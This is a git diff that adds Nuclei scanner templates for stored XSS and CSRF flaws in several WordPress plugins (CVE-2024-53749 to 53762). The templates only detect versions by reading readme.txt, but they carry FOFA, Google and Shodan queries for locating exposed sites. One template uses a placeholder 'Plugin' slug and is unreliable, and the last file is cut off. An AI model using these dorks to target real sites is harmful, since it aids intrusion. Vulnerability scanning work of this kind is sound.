diff --git a/poc/cve/CVE-2024-53749-1d9d87f4022b97c2e4089a6828e241fc.yaml b/poc/cve/CVE-2024-53749-1d9d87f4022b97c2e4089a6828e241fc.yaml
new file mode 100644
index 0000000000..b441125385
--- /dev/null
+++ b/poc/cve/CVE-2024-53749-1d9d87f4022b97c2e4089a6828e241fc.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53749-1d9d87f4022b97c2e4089a6828e241fc
+
+info:
+ name: >
+ Post Carousel Slider for Elementor <= 1.4.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Post Carousel Slider for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c205041a-01c9-44cd-8270-dafae2a78cbf?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53749
+ metadata:
+ fofa-query: "wp-content/plugins/post-carousel-slider-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/post-carousel-slider-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-53749'
+ tags: cve,wordpress,wp-plugin,post-carousel-slider-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/post-carousel-slider-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "post-carousel-slider-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53750-631ac7e2fd3894f3f08f81c51233807e.yaml b/poc/cve/CVE-2024-53750-631ac7e2fd3894f3f08f81c51233807e.yaml
new file mode 100644
index 0000000000..4a7e5a16b1
--- /dev/null
+++ b/poc/cve/CVE-2024-53750-631ac7e2fd3894f3f08f81c51233807e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53750-631ac7e2fd3894f3f08f81c51233807e
+
+info:
+ name: >
+ PayPal Responder <= 1.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The PayPal Responder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c6b43a4f-ef44-46cf-89ce-5747ac5f47cd?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53750
+ metadata:
+ fofa-query: "wp-content/plugins/paypal-responder/"
+ google-query: inurl:"/wp-content/plugins/paypal-responder/"
+ shodan-query: 'vuln:CVE-2024-53750'
+ tags: cve,wordpress,wp-plugin,paypal-responder,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/paypal-responder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "paypal-responder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53751-eec858ad68cecec914c1fdcabd2501d5.yaml b/poc/cve/CVE-2024-53751-eec858ad68cecec914c1fdcabd2501d5.yaml
new file mode 100644
index 0000000000..c6c06c2277
--- /dev/null
+++ b/poc/cve/CVE-2024-53751-eec858ad68cecec914c1fdcabd2501d5.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53751-eec858ad68cecec914c1fdcabd2501d5
+
+info:
+ name: >
+ Build App Online <= 1.0.22 - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+ The Build App Online plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.22. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9a68e014-69df-4498-9cc2-618d966e5ed6?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-53751
+ metadata:
+ fofa-query: "wp-content/plugins/build-app-online/"
+ google-query: inurl:"/wp-content/plugins/build-app-online/"
+ shodan-query: 'vuln:CVE-2024-53751'
+ tags: cve,wordpress,wp-plugin,build-app-online,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/build-app-online/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "build-app-online"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.22')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53752-4e8cd08f77b9779e9257358737a94eef.yaml b/poc/cve/CVE-2024-53752-4e8cd08f77b9779e9257358737a94eef.yaml
new file mode 100644
index 0000000000..f4b9130e48
--- /dev/null
+++ b/poc/cve/CVE-2024-53752-4e8cd08f77b9779e9257358737a94eef.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53752-4e8cd08f77b9779e9257358737a94eef
+
+info:
+ name: >
+ Stripe Donation <= 1.2.5 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Stripe Donation plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.2.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4335e598-d48b-4dbe-b6a4-69790acecfdd?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53752
+ metadata:
+ fofa-query: "wp-content/plugins/bin-stripe-donation/"
+ google-query: inurl:"/wp-content/plugins/bin-stripe-donation/"
+ shodan-query: 'vuln:CVE-2024-53752'
+ tags: cve,wordpress,wp-plugin,bin-stripe-donation,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bin-stripe-donation/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bin-stripe-donation"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53753-358e653d0dd73eb56688321aaef32145.yaml b/poc/cve/CVE-2024-53753-358e653d0dd73eb56688321aaef32145.yaml
new file mode 100644
index 0000000000..ac7d701567
--- /dev/null
+++ b/poc/cve/CVE-2024-53753-358e653d0dd73eb56688321aaef32145.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53753-358e653d0dd73eb56688321aaef32145
+
+info:
+ name: >
+ CultBooking Hotel Booking Engine <= 2.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The CultBooking Hotel Booking Engine plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/79844b53-5527-42e2-8363-db0eb73d1f6c?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53753
+ metadata:
+ fofa-query: "wp-content/plugins/cultbooking-booking-engine/"
+ google-query: inurl:"/wp-content/plugins/cultbooking-booking-engine/"
+ shodan-query: 'vuln:CVE-2024-53753'
+ tags: cve,wordpress,wp-plugin,cultbooking-booking-engine,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cultbooking-booking-engine/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cultbooking-booking-engine"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53754-493566f1c1a1308e200b9e93498256c2.yaml b/poc/cve/CVE-2024-53754-493566f1c1a1308e200b9e93498256c2.yaml
new file mode 100644
index 0000000000..77991f2135
--- /dev/null
+++ b/poc/cve/CVE-2024-53754-493566f1c1a1308e200b9e93498256c2.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53754-493566f1c1a1308e200b9e93498256c2
+
+info:
+ name: >
+ Out Of Stock Badge <= 1.3.1 - Cross-Site Request Forgery to Stored Cross-site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Out Of Stock Badge plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b80802cd-6fcc-4cdb-b6d7-a9171cadcc83?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53754
+ metadata:
+ fofa-query: "wp-content/plugins/out-of-stock-badge/"
+ google-query: inurl:"/wp-content/plugins/out-of-stock-badge/"
+ shodan-query: 'vuln:CVE-2024-53754'
+ tags: cve,wordpress,wp-plugin,out-of-stock-badge,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/out-of-stock-badge/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "out-of-stock-badge"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53755-504d4dcc3efe862c171e1626b904f4e4.yaml b/poc/cve/CVE-2024-53755-504d4dcc3efe862c171e1626b904f4e4.yaml
new file mode 100644
index 0000000000..534b8119c2
--- /dev/null
+++ b/poc/cve/CVE-2024-53755-504d4dcc3efe862c171e1626b904f4e4.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53755-504d4dcc3efe862c171e1626b904f4e4
+
+info:
+ name: >
+ Third Party Cookie Eraser <= 1.0.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Third Party Cookie Eraser plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ded8f958-ed2a-43ab-8688-9f6d16515469?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53755
+ metadata:
+ fofa-query: "wp-content/plugins/third-party-cookie-eraser/"
+ google-query: inurl:"/wp-content/plugins/third-party-cookie-eraser/"
+ shodan-query: 'vuln:CVE-2024-53755'
+ tags: cve,wordpress,wp-plugin,third-party-cookie-eraser,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/third-party-cookie-eraser/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "third-party-cookie-eraser"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53756-9cd6fd513857f8e7aa7f612ae1f35644.yaml b/poc/cve/CVE-2024-53756-9cd6fd513857f8e7aa7f612ae1f35644.yaml
new file mode 100644
index 0000000000..975ac496f3
--- /dev/null
+++ b/poc/cve/CVE-2024-53756-9cd6fd513857f8e7aa7f612ae1f35644.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53756-9cd6fd513857f8e7aa7f612ae1f35644
+
+info:
+ name: >
+ Vertical Carousel <= 1.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Vertical Carousel plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8ae463ae-5bfb-4e7c-9f84-edaa9a826ffa?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53756
+ metadata:
+ fofa-query: "wp-content/plugins/vertical-carousel-slider/"
+ google-query: inurl:"/wp-content/plugins/vertical-carousel-slider/"
+ shodan-query: 'vuln:CVE-2024-53756'
+ tags: cve,wordpress,wp-plugin,vertical-carousel-slider,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/vertical-carousel-slider/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "vertical-carousel-slider"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53757-9e5a50025a96a90d40bab8055add551b.yaml b/poc/cve/CVE-2024-53757-9e5a50025a96a90d40bab8055add551b.yaml
new file mode 100644
index 0000000000..f72dab3c90
--- /dev/null
+++ b/poc/cve/CVE-2024-53757-9e5a50025a96a90d40bab8055add551b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53757-9e5a50025a96a90d40bab8055add551b
+
+info:
+ name: >
+ WP Find Your Nearest <= 0.3.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The WP Find Your Nearest plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 0.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f348e019-d4b5-4384-8ee9-117694259b92?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53757
+ metadata:
+ fofa-query: "wp-content/plugins/wp-find-your-nearest/"
+ google-query: inurl:"/wp-content/plugins/wp-find-your-nearest/"
+ shodan-query: 'vuln:CVE-2024-53757'
+ tags: cve,wordpress,wp-plugin,wp-find-your-nearest,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-find-your-nearest/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-find-your-nearest"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 0.3.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53758-ebe442ae0c94160a0452474317b40359.yaml b/poc/cve/CVE-2024-53758-ebe442ae0c94160a0452474317b40359.yaml
new file mode 100644
index 0000000000..4d9fe97ecb
--- /dev/null
+++ b/poc/cve/CVE-2024-53758-ebe442ae0c94160a0452474317b40359.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53758-ebe442ae0c94160a0452474317b40359
+
+info:
+ name: >
+ WP MathJax <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The WP MathJax plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2b0bb89c-6c56-4037-8a55-487244e8d519?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53758
+ metadata:
+ fofa-query: "wp-content/plugins/wp-mathjax-plus/"
+ google-query: inurl:"/wp-content/plugins/wp-mathjax-plus/"
+ shodan-query: 'vuln:CVE-2024-53758'
+ tags: cve,wordpress,wp-plugin,wp-mathjax-plus,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-mathjax-plus/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-mathjax-plus"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53759-dbad57d1fe7a81773ada836f186bcbb3.yaml b/poc/cve/CVE-2024-53759-dbad57d1fe7a81773ada836f186bcbb3.yaml
new file mode 100644
index 0000000000..132f83f96a
--- /dev/null
+++ b/poc/cve/CVE-2024-53759-dbad57d1fe7a81773ada836f186bcbb3.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53759-dbad57d1fe7a81773ada836f186bcbb3
+
+info:
+ name: >
+ ArCa Payment Gateway <= 1.3.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The ArCa Payment Gateway plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6ec069ef-7b53-47b5-93bc-92cfc2d62c88?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2024-53759
+ metadata:
+ fofa-query: "wp-content/plugins/arca-payment-gateway/"
+ google-query: inurl:"/wp-content/plugins/arca-payment-gateway/"
+ shodan-query: 'vuln:CVE-2024-53759'
+ tags: cve,wordpress,wp-plugin,arca-payment-gateway,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/arca-payment-gateway/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "arca-payment-gateway"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53760-491bf87c29a91b27218dea79d03b2338.yaml b/poc/cve/CVE-2024-53760-491bf87c29a91b27218dea79d03b2338.yaml
new file mode 100644
index 0000000000..cc6dbfc25a
--- /dev/null
+++ b/poc/cve/CVE-2024-53760-491bf87c29a91b27218dea79d03b2338.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53760-491bf87c29a91b27218dea79d03b2338
+
+info:
+ name: >
+ Capitalize My Title <= 0.5.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Capitalize My Title plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 0.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/44e53c69-e301-4007-b090-c277e9f07905?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53760
+ metadata:
+ fofa-query: "wp-content/plugins/capitalize-my-title/"
+ google-query: inurl:"/wp-content/plugins/capitalize-my-title/"
+ shodan-query: 'vuln:CVE-2024-53760'
+ tags: cve,wordpress,wp-plugin,capitalize-my-title,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/capitalize-my-title/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "capitalize-my-title"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 0.5.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53761-ccd75e569a6f5c92a6b627a161efff1a.yaml b/poc/cve/CVE-2024-53761-ccd75e569a6f5c92a6b627a161efff1a.yaml
new file mode 100644
index 0000000000..11a8b5789a
--- /dev/null
+++ b/poc/cve/CVE-2024-53761-ccd75e569a6f5c92a6b627a161efff1a.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53761-ccd75e569a6f5c92a6b627a161efff1a
+
+info:
+ name: >
+ WP Revisions Manager <= 1.0.2 - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+ The WP Revisions Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.2. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/96a5db79-a88d-4c1f-9da4-6dd3120ff85e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53761
+ metadata:
+ fofa-query: "wp-content/plugins/Plugin/"
+ google-query: inurl:"/wp-content/plugins/Plugin/"
+ shodan-query: 'vuln:CVE-2024-53761'
+ tags: cve,wordpress,wp-plugin,Plugin,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/Plugin/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "Plugin"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-53762-f6f324446de244136f8f61b504284d66.yaml b/poc/cve/CVE-2024-53762-f6f324446de244136f8f61b504284d66.yaml
new file mode 100644
index 0000000000..41b81bc624
--- /dev/null
+++ b/poc/cve/CVE-2024-53762-f6f324446de244136f8f61b504284d66.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53762-f6f324446de244136f8f61b504284d66
+
+info:
+ name: >
+ FastBook – Responsive Appointment Booking and Scheduling System <= 1.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The FastBook – Responsive Appointment Booking and Scheduling System plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c5fd2255-7f02-4de8-b904-a753580123b9?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-53762
+ metadata:
+ fofa-query: "wp-content/plugins/fastbook-responsive-appointment-booking-and-scheduling-system/"
+ google-query: inurl:"/wp-content/plugins/fastbook-responsive-appointment-booking-and-scheduling-system/"
+ shodan-query: 'vuln:CVE-2024-53762'
+ tags: cve,wordpress,wp-plugin,fastbook-responsive-appointment-booking-and-scheduling-system,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/fastbook-responsive-appointment-booking-and-scheduling-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
